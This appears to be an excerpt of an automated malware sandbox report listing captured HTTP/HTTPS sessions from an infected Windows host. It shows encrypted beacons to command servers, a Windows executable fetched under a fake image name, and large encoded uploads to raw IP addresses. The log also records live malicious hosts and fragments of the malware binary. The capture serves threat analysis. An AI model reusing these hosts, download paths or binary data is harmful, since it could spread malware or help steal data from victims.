3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.10	49815	189.165.133.52	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 19:57:58.393811941 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://rhafqfudulgf.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 345 Host: gebeus.ru
Jul 24, 2024 19:57:58.393811941 CEST	345	OUT	Data Raw: 3b 6e 59 17 f2 c9 1e 24 ab a8 b0 07 74 07 7d c9 7a 0d b9 e7 19 08 e1 60 7b 0f 73 96 32 c5 c6 62 9e 2c c3 20 05 68 20 6e 9f 9b 3f c1 3d 38 da 8e 7f b9 1a 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7e 1d c4 a1 Data Ascii: ;nY$t}z`{s2b, h n?=8t M@NA .[k,vu~o\B`icKg5jTdk~aDG,=2"zvV)5*axk,@Q/!E&:~.onJR`Co?I
Jul 24, 2024 19:57:59.444520950 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 24 Jul 2024 17:57:59 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.10	49825	189.165.133.52	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 19:58:13.044200897 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://bmucdlsvjvamj.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 204 Host: gebeus.ru
Jul 24, 2024 19:58:13.044217110 CEST	204	OUT	Data Raw: 3b 6e 59 17 f2 c9 1e 24 ab a8 b0 07 74 07 7d c9 7a 0d b9 e7 19 08 e1 60 7b 0f 73 96 32 c5 c6 62 9e 2c c3 20 05 68 20 6e 9f 9b 3f c1 3d 38 da 8e 7f b9 1a 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 46 26 e0 b8 Data Ascii: ;nY$t}z`{s2b, h n?=8t M@NA .[k,vuF&mU]iH;!td,[y0D:/^}MQv`;@-txk].~2s(i
Jul 24, 2024 19:58:14.130640984 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 24 Jul 2024 17:58:13 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.10	49833	211.168.53.110	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 19:58:30.098592043 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ebgowpcalmic.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 187 Host: gebeus.ru
Jul 24, 2024 19:58:30.098638058 CEST	187	OUT	Data Raw: 3b 6e 59 17 f2 c9 1e 24 ab a8 b0 07 74 07 7d c9 7a 0d b9 e7 19 08 e1 60 7b 0f 73 96 32 c5 c6 62 9e 2c c3 20 05 68 20 6e 9f 9b 3f c1 3d 38 da 8e 7f b9 1a 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 60 42 ea f8 Data Ascii: ;nY$t}z`{s2b, h n?=8t M@NA .[k,vu`BR;~h-L\Rf&!6W))%=MvBS4Fs.b#t$(3
Jul 24, 2024 19:58:31.686600924 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 24 Jul 2024 17:58:31 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.10	49840	211.168.53.110	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 19:58:43.690068960 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://kguhhqwlowh.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 224 Host: gebeus.ru
Jul 24, 2024 19:58:43.690092087 CEST	224	OUT	Data Raw: 3b 6e 59 17 f2 c9 1e 24 ab a8 b0 07 74 07 7d c9 7a 0d b9 e7 19 08 e1 60 7b 0f 73 96 32 c5 c6 62 9e 2c c3 20 05 68 20 6e 9f 9b 3f c1 3d 38 da 8e 7f b9 1a 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 29 24 af e1 Data Ascii: ;nY$t}z`{s2b, h n?=8t M@NA .[k,vu)$Nkx\_\~b9>GQDAP>ob*]6=$gkXV"xd!V)VMahn@ll
Jul 24, 2024 19:58:45.193727016 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 24 Jul 2024 17:58:44 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.10	49847	211.168.53.110	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 19:58:55.793935061 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ajhanernmeqt.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 175 Host: gebeus.ru
Jul 24, 2024 19:58:55.793965101 CEST	175	OUT	Data Raw: 3b 6e 59 17 f2 c9 1e 24 ab a8 b0 07 74 07 7d c9 7a 0d b9 e7 19 08 e1 60 7b 0f 73 96 32 c5 c6 62 9e 2c c3 20 05 68 20 6e 9f 9b 3f c1 3d 38 da 8e 7f b9 1a 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 2b 02 c4 a3 Data Ascii: ;nY$t}z`{s2b, h n?=8t M@NA .[k,vu+K2_H-bM]z<N]bOK_[B!s<Z;II9L
Jul 24, 2024 19:58:57.302325010 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 24 Jul 2024 17:58:56 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.10	49737	185.149.100.242	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:56:29 UTC	179	OUT	GET /wp-content/images/pic1.jpg HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: mussangroup.com
2024-07-24 17:56:30 UTC	452	IN	HTTP/1.1 200 OK Connection: close cache-control: public, max-age=604800 expires: Wed, 31 Jul 2024 17:56:29 GMT content-type: image/jpeg last-modified: Wed, 24 Jul 2024 11:31:45 GMT accept-ranges: bytes content-length: 11672576 date: Wed, 24 Jul 2024 17:56:29 GMT alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-07-24 17:56:30 UTC	16384	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 02 24 00 2c 49 00 00 18 b2 00 00 80 09 00 c0 14 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 10 bc 00 00 04 00 00 a4 34 b2 00 02 00 60 81 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEd.$,I@4`
2024-07-24 17:56:30 UTC	16384	IN	Data Raw: 49 3b 66 10 76 1d 55 48 89 e5 48 83 ec 18 48 8b 10 48 8b 48 08 48 89 d0 e8 a3 60 00 00 48 83 c4 18 5d c3 48 89 44 24 08 48 89 5c 24 10 e8 ee 67 06 00 48 8b 44 24 08 48 8b 5c 24 10 eb c2 cc cc 49 3b 66 10 0f 86 83 00 00 00 55 48 89 e5 48 83 ec 18 f3 0f 10 00 0f 57 c9 0f 2e c1 75 04 66 90 7b 4a 0f 2e c0 75 02 7b 33 48 89 5c 24 30 e8 cd 34 06 00 48 8b 4c 24 30 48 31 c8 48 b9 21 a6 56 6a a1 6e 75 00 48 31 c8 48 b9 bf 63 8f bb 6b ef 52 00 48 0f af c1 48 83 c4 18 5d c3 b9 04 00 00 00 e8 5a 85 06 00 48 83 c4 18 5d c3 48 b8 21 a6 56 6a a1 6e 75 00 48 31 d8 48 b9 bf 63 8f bb 6b ef 52 00 48 0f af c1 48 83 c4 18 5d c3 48 89 44 24 08 48 89 5c 24 10 e8 44 67 06 00 48 8b 44 24 08 48 8b 5c 24 10 e9 55 ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: I;fvUHHHHHH`H]HD$H\$gHD$H\$I;fUHHW.uf{J.u{3H\$04HL$0H1H!VjnuH1HckRHH]ZH]H!VjnuH1HckRHH]HD$H\$DgHD$H\$U
2024-07-24 17:56:30 UTC	16384	IN	Data Raw: e8 1b 2e 03 00 48 8d 05 0e df 65 00 bb 08 00 00 00 e8 8a 36 03 00 48 8b 44 24 18 0f 1f 44 00 00 e8 fb 34 03 00 e8 36 30 03 00 e8 51 2e 03 00 48 8b 44 24 30 48 8b 88 d8 00 00 00 48 89 4c 24 18 e8 db 2d 03 00 48 8d 05 d6 de 65 00 bb 08 00 00 00 e8 4a 36 03 00 48 8b 44 24 18 0f 1f 44 00 00 e8 bb 34 03 00 e8 f6 2f 03 00 e8 11 2e 03 00 48 8b 44 24 30 48 8b 88 e0 00 00 00 48 89 4c 24 18 e8 9b 2d 03 00 48 8d 05 9e de 65 00 bb 08 00 00 00 e8 0a 36 03 00 48 8b 44 24 18 0f 1f 44 00 00 e8 7b 34 03 00 e8 b6 2f 03 00 e8 d1 2d 03 00 48 8b 44 24 30 48 8b 88 e8 00 00 00 48 89 4c 24 18 e8 5b 2d 03 00 48 8d 05 66 de 65 00 bb 08 00 00 00 e8 ca 35 03 00 48 8b 44 24 18 0f 1f 44 00 00 e8 3b 34 03 00 e8 76 2f 03 00 e8 91 2d 03 00 48 8b 44 24 30 48 8b 88 f0 00 00 00 48 89 4c 24 Data Ascii: .He6HD$D460Q.HD$0HHL$-HeJ6HD$D4/.HD$0HHL$-He6HD$D{4/-HD$0HHL$[-Hfe5HD$D;4v/-HD$0HHL$
2024-07-24 17:56:30 UTC	16384	IN	Data Raw: 48 c1 e3 10 48 89 ce 81 e1 ff ff 07 00 48 09 cb 48 89 d9 48 c1 fb 13 48 c1 e3 03 90 90 90 66 90 48 39 da 74 05 eb 23 48 89 f0 48 8b 18 48 89 1a 48 89 c6 48 89 d8 f0 48 0f b1 0e 0f 94 c3 66 90 84 db 74 e3 48 83 c4 30 5d c3 48 89 54 24 28 48 89 74 24 18 48 89 4c 24 10 48 89 5c 24 20 66 90 e8 bb ed 02 00 48 8d 05 4a 2d 67 00 bb 2c 00 00 00 e8 2a f6 02 00 48 8b 44 24 28 0f 1f 44 00 00 e8 9b f5 02 00 48 8d 05 68 87 65 00 bb 05 00 00 00 e8 0a f6 02 00 48 8b 44 24 18 0f 1f 44 00 00 e8 7b f4 02 00 48 8d 05 ce 9e 65 00 bb 08 00 00 00 e8 ea f5 02 00 48 8b 44 24 10 0f 1f 44 00 00 e8 5b f4 02 00 48 8d 05 44 a7 65 00 bb 09 00 00 00 e8 ca f5 02 00 48 8b 44 24 20 0f 1f 44 00 00 e8 3b f5 02 00 e8 76 ef 02 00 e8 91 ed 02 00 48 8d 05 45 ca 65 00 bb 0c 00 00 00 0f 1f 44 00 Data Ascii: HHHHHHfH9t#HHHHHHftH0]HT$(Ht$HL$H\$ fHJ-g,*HD$(DHheHD$D{HeHD$D[HDeHD$ D;vHEeD
2024-07-24 17:56:30 UTC	16384	IN	Data Raw: 24 60 0f b7 7e 52 48 0f af cf 48 c1 e8 38 48 03 4b 10 3c 05 73 03 83 c0 05 48 89 4c 24 40 88 44 24 1f 48 89 ca eb 43 8b 50 54 0f ba e2 04 72 06 31 c0 31 db eb 0f 48 8b 40 30 48 89 cb 0f 1f 00 e8 9b 46 ff ff 48 85 c0 75 06 48 83 c4 50 5d c3 74 04 48 8b 40 08 e8 65 87 02 00 0f b7 7e 52 48 8d 3c 0f 48 8d 7f f8 48 8b 0f 48 85 c9 74 09 48 89 4c 24 48 31 ff eb 36 0f b6 4b 08 0f 1f 40 00 f6 c1 04 75 16 48 8d 05 25 fa 65 00 bb 15 00 00 00 e8 ca 93 02 00 48 8b 5c 24 68 0f b6 43 08 83 e0 fb 88 43 08 48 83 c4 50 5d c3 48 ff c7 48 83 ff 08 73 a7 44 0f b6 04 0f 44 38 c0 74 09 66 90 45 84 c0 75 e6 eb b1 48 89 7c 24 20 44 0f b6 46 50 4c 0f af c7 49 8d 0c 08 48 8d 49 08 44 8b 46 54 48 89 4c 24 38 41 0f ba e0 00 73 05 4c 8b 01 eb 03 49 89 c8 48 8b 4e 30 48 8b 51 18 48 8b Data Ascii: $`~RHH8HK<sHL$@D$HCPTr11H@0HFHuHP]tH@e~RH<HHHtHL$H16K@uH%eH\$hCCHP]HHsDD8tfEuH\|$ DFPLIHIDFTHL$8AsLIHN0HQH
2024-07-24 17:56:30 UTC	16384	IN	Data Raw: 24 68 48 8b 11 48 8d 72 ff 48 89 31 48 83 fa 01 75 0d e8 29 35 05 00 48 8b 4c 24 68 89 41 0c 48 89 cb e9 8d fe ff ff 48 83 fa 08 73 65 41 84 01 41 c6 04 11 00 48 85 d2 75 0a 4d 39 d1 74 be 4c 89 d0 eb 29 48 ff ca 48 83 fa 08 73 10 41 84 01 42 0f b6 34 0a 40 80 fe 01 74 cc eb a0 48 89 d0 b9 08 00 00 00 e8 d6 8a 05 00 49 89 d2 0f b7 57 52 4c 89 d6 4a 8d 14 12 48 8d 52 f8 48 8b 12 90 49 39 d1 75 e5 49 89 c2 ba 07 00 00 00 49 89 f1 eb b5 48 89 d0 b9 08 00 00 00 e8 a1 8a 05 00 90 48 89 44 24 08 48 89 5c 24 10 48 89 4c 24 18 48 89 7c 24 20 e8 67 67 05 00 48 8b 44 24 08 48 8b 5c 24 10 48 8b 4c 24 18 48 8b 7c 24 20 e9 ce fc ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc 49 3b 66 10 76 5f 55 48 89 e5 48 83 ec 18 0f b6 53 08 0f b6 73 09 f6 c2 08 75 02 ff ce 48 89 Data Ascii: $hHHrH1Hu)5HL$hAHHseAAHuM9tL)HHsAB4@tHIWRLJHRHI9uIIHHD$H\$HL$H\|$ ggHD$H\$HL$H\|$ I;fv_UHHSsuH
2024-07-24 17:56:30 UTC	16384	IN	Data Raw: 00 f2 0f 10 05 47 55 70 00 f2 0f 11 02 b8 01 00 00 00 eb 2c 48 81 c4 08 02 00 00 5d c3 4c 8b 0d 7c 61 ac 00 41 ff c0 45 0f b7 c0 0f 57 c0 f2 41 0f 2a c0 f2 41 0f 11 04 c1 48 ff c0 0f 1f 40 00 48 83 f8 44 7d 1f 48 8b 0d 5b 61 ac 00 48 8d 15 6c 3d 48 00 44 0f b7 04 42 48 39 c8 72 bf 66 90 e9 4d 17 00 00 48 8b 0d 44 61 ac 00 48 8b 1d 35 61 ac 00 48 ff c3 48 8b 05 23 61 ac 00 0f 1f 00 48 39 d9 73 3b bf 01 00 00 00 48 8d 35 2f 0e 57 00 e8 6a 75 03 00 48 89 0d 13 61 ac 00 83 3d 6c 0e b5 00 00 74 13 e8 d5 46 05 00 49 89 03 48 8b 0d eb 60 ac 00 49 89 4b 08 48 89 05 e0 60 ac 00 48 89 1d e1 60 ac 00 f2 0f 10 05 d1 55 70 00 f2 0f 11 44 d8 f8 e8 66 25 ff ff 48 89 1d e7 60 ac 00 48 89 0d e8 60 ac 00 83 3d 21 0e b5 00 00 74 13 e8 8a 46 05 00 49 89 03 48 8b 15 c0 60 ac Data Ascii: GUp,H]L\|aAEWA*AH@HD}H[aHl=HDBH9rfMHDaH5aHH#aH9s;H5/WjuHa=ltFIH`IKH`H`UpDf%H`H`=!tFIH`
2024-07-24 17:56:30 UTC	16384	IN	Data Raw: 29 d1 ff c1 d1 e1 48 8d 15 77 c9 b4 00 f0 0f b1 0a 0f 94 c1 84 c9 74 c7 90 8b 05 15 37 ac 00 89 c1 81 e1 00 00 00 80 85 c9 75 21 8d 50 01 48 8d 35 ff 36 ac 00 f0 0f b1 16 0f 94 c2 0f 1f 40 00 84 d2 74 d4 8b 15 36 e9 ad 00 eb 06 8b 15 2e e9 ad 00 89 8c 24 a4 00 00 00 89 94 24 a0 00 00 00 0f b6 74 24 26 40 84 f6 74 04 85 c9 eb 14 85 c9 0f 85 f3 08 00 00 40 84 f6 74 0d 0f 1f 44 00 00 85 c9 0f 84 d0 08 00 00 44 0f 11 bc 24 78 01 00 00 c6 84 24 88 01 00 00 00 48 c7 84 24 90 01 00 00 00 00 00 00 48 8d 05 94 09 00 00 48 89 84 24 78 01 00 00 48 8b 84 24 a8 00 00 00 48 89 84 24 80 01 00 00 0f b6 44 24 3f 88 84 24 88 01 00 00 48 8b 84 24 30 01 00 00 48 89 84 24 90 01 00 00 48 8d 84 24 78 01 00 00 48 89 04 24 e8 0f e6 04 00 45 0f 57 ff 4c 8b 35 f4 cb b4 00 65 4d 8b Data Ascii: )Hwt7u!PH56@t6.$$t$&@t@tDD$x$H$HH$xH$H$D$?$H$0H$H$xH$EWL5eM
2024-07-24 17:56:30 UTC	16384	IN	Data Raw: df 48 8d b4 24 a0 00 00 00 bb 08 00 00 00 48 89 d0 e8 ca 0e 00 00 48 8b 84 24 30 01 00 00 48 8d 7c 24 40 48 8d 7f e0 48 89 6c 24 f0 48 8d 6c 24 f0 e8 f5 cd 04 00 48 8b 6d 00 48 c7 c3 ff ff ff ff 48 89 d9 48 89 cf 48 89 c6 45 31 c0 48 8d 44 24 40 e8 49 d2 03 00 e9 d5 00 00 00 0f 1f 40 00 83 fa 06 75 0b 31 c0 48 81 c4 20 01 00 00 5d c3 90 8b 88 90 00 00 00 89 c9 48 89 8c 24 08 01 00 00 48 8b 90 98 00 00 00 48 89 94 24 00 01 00 00 e8 8b ad 01 00 48 8d 05 23 8b 64 00 bb 0c 00 00 00 e8 fa b5 01 00 48 8b 84 24 30 01 00 00 e8 6d b5 01 00 48 8d 05 ce 55 64 00 bb 07 00 00 00 90 e8 db b5 01 00 48 8b 84 24 00 01 00 00 e8 0e b3 01 00 48 8d 05 62 df 64 00 bb 13 00 00 00 66 90 e8 bb b5 01 00 48 8b 84 24 08 01 00 00 e8 ee b2 01 00 e8 69 af 01 00 e8 84 ad 01 00 48 8d 05 Data Ascii: H$HH$0H\|$@HHl$Hl$HmHHHHE1HD$@I@u1H ]H$HH$H#dH$0mHUdH$HbdfH$iH
2024-07-24 17:56:30 UTC	16384	IN	Data Raw: eb be cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 49 3b 66 10 0f 86 84 01 00 00 55 48 89 e5 48 83 ec 20 48 89 44 24 30 84 00 90 e8 21 82 fe ff 4c 89 f1 48 8b 44 24 30 48 39 48 08 0f 85 4b 01 00 00 90 e8 69 84 fe ff 0f 57 c0 31 c0 eb 06 0f 10 c1 48 89 c8 f2 0f 10 0d 2c 96 6f 00 66 0f 2e c8 0f 86 f0 00 00 00 f2 0f 11 44 24 18 48 89 44 24 10 48 8b 44 24 30 48 8b 90 90 00 00 00 48 8b 0a ff d1 84 c0 0f 85 bf 00 00 00 48 8b 4c 24 30 48 8b 91 88 00 00 00 48 8b 1a b8 00 00 01 00 ff d3 48 85 db 75 5e 48 8b 0d c4 49 b4 00 0f 1f 40 00 48 85 c9 0f 84 ce 00 00 00 48 89 c2 48 89 d3 31 d2 48 f7 f1 48 85 c0 7c 0a 0f 57 c9 f2 48 0f 2a c8 eb 18 48 89 c1 83 e0 01 48 d1 e9 48 09 c1 0f 57 c9 f2 48 0f 2a c9 f2 0f 58 c9 f2 0f 10 15 Data Ascii: I;fUHH HD$0!LHD$0H9HKiW1H,of.D$HD$HD$0HHHL$0HHHu^HI@HHH1HH\|WHHHHWHX

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.10	49738	167.235.128.153	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:56:36 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 7627
2024-07-24 17:56:36 UTC	7627	OUT	Data Raw: 54 34 48 70 79 59 73 6c 54 4a 43 48 44 56 49 39 55 6e 74 51 66 45 56 34 59 56 38 79 6d 6b 2b 49 49 79 66 4a 53 6a 6d 79 49 71 35 33 2b 67 77 53 62 79 6a 4b 4f 64 73 4e 79 45 69 74 45 52 31 58 32 32 66 61 44 6c 70 78 54 6d 36 57 35 71 4b 33 69 76 49 43 35 67 54 67 2b 53 36 66 4c 33 4b 59 37 7a 66 6e 7a 78 50 78 66 45 65 6f 41 69 76 6c 74 53 68 66 54 54 38 42 63 36 2f 4a 65 72 79 48 47 51 39 41 56 79 7a 42 4b 31 48 4e 2b 48 41 57 78 48 6b 49 70 68 7a 35 54 39 56 70 56 4e 6d 32 33 33 66 6c 5a 74 63 50 78 79 31 69 34 41 51 68 6f 51 42 4e 73 73 44 44 56 6d 75 56 32 6a 33 76 71 2b 51 55 39 4f 48 53 77 4c 45 76 48 63 50 54 68 45 35 38 74 77 37 72 4e 50 74 37 42 50 58 6e 61 44 4a 4a 52 76 6f 38 66 2b 4a 54 44 31 62 33 61 76 47 6c 78 30 6b 75 4c 6c 52 64 31 36 42 Data Ascii: T4HpyYslTJCHDVI9UntQfEV4YV8ymk+IIyfJSjmyIq53+gwSbyjKOdsNyEitER1X22faDlpxTm6W5qK3ivIC5gTg+S6fL3KY7zfnzxPxfEeoAivltShfTT8Bc6/JeryHGQ9AVyzBK1HN+HAWxHkIphz5T9VpVNm233flZtcPxy1i4AQhoQBNssDDVmuV2j3vq+QU9OHSwLEvHcPThE58tw7rNPt7BPXnaDJJRvo8f+JTD1b3avGlx0kuLlRd16B
2024-07-24 17:56:37 UTC	94	IN	HTTP/1.1 200 OK Content-Length: 0 Date: Wed, 24 Jul 2024 17:56:37 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.10	49739	107.173.160.137	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:56:38 UTC	236	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 139784
2024-07-24 17:56:38 UTC	16148	OUT	Data Raw: 54 68 51 38 7a 2b 4d 4f 5a 57 41 4e 75 46 67 45 55 58 78 49 52 70 34 65 4c 67 53 6e 2f 38 64 6e 6c 2f 4e 5a 2b 78 58 33 76 44 55 64 6a 73 5a 6f 7a 72 58 77 2f 64 38 44 44 4f 2f 4c 75 56 51 63 6c 30 63 36 58 6b 6d 62 39 67 5a 6a 79 55 47 2b 48 6e 55 41 6a 2f 69 61 32 4c 5a 4c 69 69 2f 58 4c 39 6f 67 45 61 4b 41 30 41 69 72 62 59 49 73 54 77 71 49 39 32 7a 68 76 56 4b 5a 65 5a 30 5a 4e 31 70 37 4d 61 66 4f 32 37 31 54 57 6d 4d 79 43 77 62 78 2f 55 48 4d 32 57 31 58 72 6a 47 6e 52 31 59 31 46 47 52 38 43 33 4d 54 74 57 66 44 41 34 4a 41 64 66 6b 55 59 72 6a 33 58 53 54 49 38 58 31 42 77 61 62 54 37 61 55 56 6e 63 54 34 39 41 31 48 67 4a 72 59 53 69 31 4f 4c 4e 79 73 4c 54 59 66 69 65 63 41 59 50 52 41 69 71 4c 71 71 57 4a 7a 31 41 38 51 37 5a 6b 76 66 65 46 Data Ascii: ThQ8z+MOZWANuFgEUXxIRp4eLgSn/8dnl/NZ+xX3vDUdjsZozrXw/d8DDO/LuVQcl0c6Xkmb9gZjyUG+HnUAj/ia2LZLii/XL9ogEaKA0AirbYIsTwqI92zhvVKZeZ0ZN1p7MafO271TWmMyCwbx/UHM2W1XrjGnR1Y1FGR8C3MTtWfDA4JAdfkUYrj3XSTI8X1BwabT7aUVncT49A1HgJrYSi1OLNysLTYfiecAYPRAiqLqqWJz1A8Q7ZkvfeF
2024-07-24 17:56:38 UTC	16384	OUT	Data Raw: 55 68 6c 70 37 74 45 39 78 6f 61 39 73 6b 4a 2f 31 6c 55 61 6c 66 39 70 41 39 4d 58 2f 76 72 79 6c 35 42 78 79 31 67 59 42 72 63 4f 62 76 69 4a 61 42 45 4b 4b 50 79 4a 77 73 77 37 4e 42 58 4d 53 68 38 48 77 68 64 2b 48 61 4e 41 66 47 43 6b 79 2f 53 57 78 43 6b 30 63 37 44 70 4c 37 34 31 2f 42 35 78 34 69 68 53 4f 44 47 37 79 4a 59 6d 72 50 37 32 53 59 33 59 71 78 2f 5a 75 61 6a 45 38 73 34 42 44 62 4f 46 51 73 4b 47 6a 75 37 36 44 6d 31 37 77 43 53 47 52 6f 48 56 6a 4f 77 32 35 57 52 37 46 44 77 31 43 4d 30 6e 5a 67 58 63 69 72 49 6d 79 67 64 64 54 6a 64 39 31 31 45 6a 38 54 31 74 61 61 77 78 50 4f 62 6c 4e 48 43 63 37 67 33 41 4b 78 2f 5a 36 44 64 63 4d 38 6e 58 48 76 35 48 71 46 49 37 57 4f 6b 78 38 77 75 5a 31 2b 76 31 53 52 73 32 61 51 6d 75 53 51 50 Data Ascii: Uhlp7tE9xoa9skJ/1lUalf9pA9MX/vryl5Bxy1gYBrcObviJaBEKKPyJwsw7NBXMSh8Hwhd+HaNAfGCky/SWxCk0c7DpL741/B5x4ihSODG7yJYmrP72SY3Yqx/ZuajE8s4BDbOFQsKGju76Dm17wCSGRoHVjOw25WR7FDw1CM0nZgXcirImygddTjd911Ej8T1taawxPOblNHCc7g3AKx/Z6DdcM8nXHv5HqFI7WOkx8wuZ1+v1SRs2aQmuSQP
2024-07-24 17:56:38 UTC	16384	OUT	Data Raw: 53 6f 42 42 75 55 37 6b 56 78 44 6d 47 30 41 6d 5a 58 72 54 34 30 4c 48 6f 63 2b 6f 6f 39 39 68 4d 62 74 44 2b 6b 73 48 63 33 70 51 39 76 30 4e 71 76 31 63 37 4c 73 65 59 70 65 32 59 51 39 44 6f 2f 33 36 44 70 68 34 32 5a 34 71 6a 72 53 4a 47 5a 51 59 77 4a 46 47 65 70 5a 41 42 6d 42 65 78 33 72 4d 63 33 46 52 4c 72 6b 73 53 73 6a 31 45 2b 68 59 46 6c 34 4b 37 52 62 48 70 67 52 58 72 4f 68 75 59 4b 4a 64 6f 45 79 43 31 50 59 4f 46 5a 61 6f 4b 47 4a 79 6d 49 71 52 33 42 6f 74 63 55 53 4f 71 47 4a 62 41 63 65 52 57 6f 49 64 63 36 67 6b 37 41 33 49 48 4c 50 45 33 63 55 30 4c 46 70 52 6a 39 43 53 30 66 38 49 77 68 63 76 5a 72 38 70 31 30 42 49 6e 62 39 73 78 51 7a 6a 6b 35 7a 46 45 6e 32 73 61 31 